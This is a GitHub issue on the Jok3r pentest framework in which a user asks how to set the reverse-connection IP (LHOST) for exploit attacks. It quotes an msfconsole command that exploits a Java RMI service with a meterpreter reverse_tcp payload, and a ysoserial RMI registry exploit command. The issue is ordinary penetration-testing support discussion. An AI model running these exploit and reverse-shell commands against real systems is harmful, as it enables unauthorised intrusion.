koutto / jok3r

Jok3r v3 BETA 2 - Network and Web Pentest Automation Framework
https://www.jok3r-framework.com
Other
1.03k stars 253 forks source link

How can change my Reverse IP for exploit attacks, There is shown Default 127.0.0.1 #39

Open smileronin opened 5 years ago

smileronin commented 5 years ago

Hi, Firstly, thank you very much for your working , really it's very useful tool.

My question: How can change my Reverse IP for exploit attacks, For.ex ; I running the following command for a attack python3 jok3r.py attack -m testDB -f "service=java-rmi" --fast

I see in the screen my reverse IP such as LHOST 127.0.0.1, I think So, this exploit could not doing connection.

_cmd> sudo msfconsole -q -x "use exploit/multi/misc/java_rmi_server; set RHOST 192.168.183.11; set RPORT 5001; set VERBOSE true; set LPORT 8443; set SRVPORT 9080; ; set PAYLOAD java/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 8443; set AutoRunScript multi_console_command -c getuid,ps,exit; exploit; sleep 2; exit"

cmd> ./run-ysoserial.sh ysoserial.exploit.RMIRegistryExploit 192.168.183.11 5001 Myfaces1 127.0.0.1_

How can do my eth0 interface IP to replacement as LHOST IP?